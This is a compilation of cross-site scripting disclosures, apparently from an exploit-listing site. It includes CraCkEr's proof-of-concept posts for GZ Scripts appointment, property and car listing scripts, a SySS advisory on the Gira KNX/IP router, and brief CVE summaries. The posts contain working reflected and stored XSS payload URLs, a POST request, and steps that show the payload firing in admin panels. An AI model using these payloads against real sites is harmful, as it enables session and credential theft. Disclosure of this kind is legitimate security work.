GZ Appointment Scheduling version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/php-gz-appointment-scheduling-script.html            ││  Vendor   : GZ Scripts                                                                 ││  Software : GZ Appointment Scheduling 1.8                                              ││  Vuln Type: Stored XSS                                                                 ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││                                                                                        ││  Allow Attacker to inject malicious code into website, give ability to steal sensitive ││  information, manipulate data, and launch additional attacks.                          ││                                                                                        │   ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘## Stored XSS-----------------------------------------------POST /PHPGZAppointment/load.php?controller=GzFront&action=step5 HTTP/1.1service_id=1&employee_id=1&timeslot=1688119200&lang=3&date=2023-06-30&title=mr&male=male&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=xxx&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=murimy&terms=1&lang=3-----------------------------------------------POST parameter 'first_name' is vulnerable to XSSPOST parameter 'second_name' is vulnerable to XSSPOST parameter 'phone' is vulnerable to XSSPOST parameter 'address_1' is vulnerable to XSSPOST parameter 'country' is vulnerable to XSS## Steps to Reproduce:1. As a [Guest User] Choose any [Employee] & Select the Day and the Time2. Inject your [XSS Payload] in "First Name"3. Inject your [XSS Payload] in "Last Name"4. Inject your [XSS Payload] in "Phone"5. Inject your [XSS Payload] in "Address Line 1"6. Inject your [XSS Payload] in "Country"7. Accept with terms & Press [Booking]   XSS Fired on Local User Browser8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php#!/GzAdmin/home/)   XSS Will Fire and Executed on his Browser9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php#!/GzBooking/index/)   XSS Will Fire and Executed on his Browser   10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php#!/GzInvoice/index/)    XSS Will Fire and Executed on his Browser      [-] Done

GZ Appointment Scheduling 1.8 Cross Site Scripting

Property Listing Script version 1.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/property-listing-script.html                         ││  Vendor   : GZ Scripts                                                                 ││  Software : Property Listing Script 1.0                                                ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttps://website/preview.php?&page=j5wno%22%3e%3cscript%3ealert(1)%3c%2fscript%3epjd8c&sort_by=ascpricePath: /preview.phpGET 'layout' parameter is vulnerable to RXSShttps://website/preview.php?layout=gridpv063%22%3e%3cscript%3ealert(1)%3c%2fscript%3eg46bcPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttps://website/preview.php?&page=1&sort_by=orbb0%22%3e%3cscript%3ealert(1)%3c%2fscript%3edhv9a[-] Done

Property Listing Script 1.0 Cross Site Scripting

Car Listing Script version 1.8 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : https://gzscripts.com/car-listing-script-php.html                          ││  Vendor   : GZ Scripts                                                                 ││  Software : Car Listing Script 1.8                                                     ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09           CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /preview.phpURL parameter is vulnerable to RXSShttp://website/preview.php/n42rk"><script>alert(1)</script>i2rgn?controller=GzFront&action=detail&car_id=10Path: /preview.phpGET 'page' parameter is vulnerable to RXSShttp://website/preview.php?&page=tdnzc%22%3e%3cscript%3ealert(1)%3c%2fscript%3eq4n0s&sort_by=old_listingPath: /preview.phpGET 'sort_by' parameter is vulnerable to RXSShttp://website/preview.php?&page=1&sort_by=bpei5%22%3e%3cscript%3ealert(1)%3c%2fscript%3erfgo3[-] Done

Car Listing Script 1.8 Cross Site Scripting

Joplin before 2.11.5 allows XSS via a USE element in an SVG document.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    Explore
    
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   For
    
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    By Solution
    
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    Case Studies
    
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    Repositories
    
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

CVE-2023-37298: Release v2.11.5 · laurent22/joplin

The web interface of Gira Giersiepen Gira KNX/IP-Router 3.1.3683.0 and 3.3.8.0 responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to reflective cross-site scripting (XSS).

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2023-016 Product: Gira KNX IP router Manufacturer: Gira Giersiepen GmbH & Co. KG Affected Version(s): 3.1.3683.0, 3.3.8.0 Tested Version(s): 3.1.3683.0, 3.3.8.0 Vulnerability Type: Cross-Site Scripting (CWE-79) Risk Level: Medium Solution Status: Unknown Manufacturer Notification: 2023-05-11 Solution Date: Unknown Public Disclosure: 2023-06-28 CVE Reference: CVE-2023-33276 Author of Advisory: Marc Gessler, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: The Gira KNX/IP router is a connection device for KNX lines for data transmission over the Internet Protocol. The manufacturer describes the product as follows (see \[1\]): > Connection of KNX lines with aid of data networks and use of the Internet protocol (IP). > Coupling of a KNX system together with the Gira HomeServer or Gira FacilityServer. > Filtering and forwarding of telegrams. > Use as line or area coupler. \[...\] Due to insufficient validation of user-provided input, it is vulnerable to cross-site scripting attacks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: The web server interface of the product responds with a "404 - Not Found" status code if a path is accessed that does not exist. However, the value of the path is reflected in the response. As the application will reflect the supplied path without context-sensitive HTML encoding, it is vulnerable to a reflective cross-site scripting attack. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): Request: GET /%3Cimg%20src=SySS%20onerror=alert(%22XSS\_GIRA\_KNX/IP-Router%22)%3E HTTP/1.1 Response: HTTP/1.1 404 Not Found Server: ise GmbH HTTP-Server v2.0 Accept-Ranges: bytes Cache-Control: no-store, no-cache Content-Type: text/html Content-Length: 63 / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: Context-sensitive HTML encoding of user input before reflecting it back can be used to prevent a successful reflected cross-site scripting attack. More information can be found at: https://cheatsheetseries.owasp.org/cheatsheets/Cross\_Site\_Scripting\_Prevention\_Cheat\_Sheet.html. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-05-09: Vulnerability discovered 2023-05-11: Vulnerability reported to manufacturer 2023-06-28: Public disclosure of vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: \[1\] Product website for Gira KNX IP router https://katalog.gira.de/en/datenblatt.html?id=658626 \[2\] SySS Security Advisory SYSS-2023-016 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-016.txt \[3\] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Marc Gessler of SySS GmbH. E-Mail: marc.gessler@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/marc\_gessler.asc Key ID: 0x5077DCEB1C98D0A2 Key Fingerprint: 3F7B B558 6734 8FCF 25A0 F596 5077 DCEB 1C98 D0A2 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEEP3u1WGc0j88loPWWUHfc6xyY0KIFAmSaldAACgkQUHfc6xyY 0KIGvA/6AzbvWJ4hGNZ4wIh3vCk+RAUTr+85qvyDT2+1WaucwejYTTVOcTkm3Qy7 iQtRCrkN1zJedhC6v4S21/K0GZz55Lsw3Fo/vZ+8RLY8uWPYaRMRci9YUvDx5vmK EXqInUB7+5LWIt4YBDcE4xxlpOx+uDFroXMZyp7WBHVQ1iFdd3H0fu5RT7+PJSUS Cmt1SFYUPP6VDcT1UX14WdWglQ287V2HD3MPZ0Ot42QawrQxa8t035EP84ErP1iC 7NkWYBRRyTHXKRJNHuhSEo5KR0bS/bZb728qvPIHuIbg9Foyba4ocT8D2cd2O2xt f7r8tuSVaqOdxCGNduB54lIuXwbAnGKSSU4Uv9V+rfPT8vCWnIUXS4KilA3g+BI5 HG5xQj3yhd+KAnAlDeG7VWGpr+ZFrxG89ouDeSVuzMS5QF7qmE/15MQyru/VqhVB X8JosxR65088vTxYptjBAW2Xs+3LGbbBKVWKitfGB1k8CBWnDW+AR2nKA9xg4Tbv xfjb+v3tQJxUY5P9y5aYIrEnDn8sifn2mOkBD173Nwiz6NPPsV8OsgceBH0wrE+4 00jXoo7knDLOTpb9p8gVrLQ2fZIUlSG0N8XYtOfbZ4cxLC2IyTKklWmSyWvhS3/I I5tjosrMw8A/MiQQJo0wdaEh/FPkd+BXnks+phO6q7Unq+yJl6w= =wlzJ -----END PGP SIGNATURE-----

CVE-2023-33276

Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8.

CVE-2023-3479

A vulnerability was found in RocketSoft Rocket LMS 1.7. It has been declared as problematic. This vulnerability affects unknown code of the file /contact/store of the component Contact Form. The manipulation of the argument name/subject/message leads to cross site scripting. The attack can be initiated remotely. The identifier of this vulnerability is VDB-232756.

CVE-2023-3477

A vulnerability was found in SimplePHPscripts Event Script 2.1 and classified as problematic. Affected by this issue is some unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. It is recommended to upgrade the affected component. VDB-232754 is the identifier assigned to this vulnerability.

CVE-2023-3475

A vulnerability has been found in SimplePHPscripts Simple Blog 3.2 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. It is recommended to upgrade the affected component. The identifier VDB-232753 was assigned to this vulnerability.

CVE-2023-3474

A vulnerability was found in SimplePHPscripts GuestBook Script 2.2. It has been classified as problematic. This affects an unknown part of the file preview.php of the component URL Parameter Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-232755.

Tag

#xss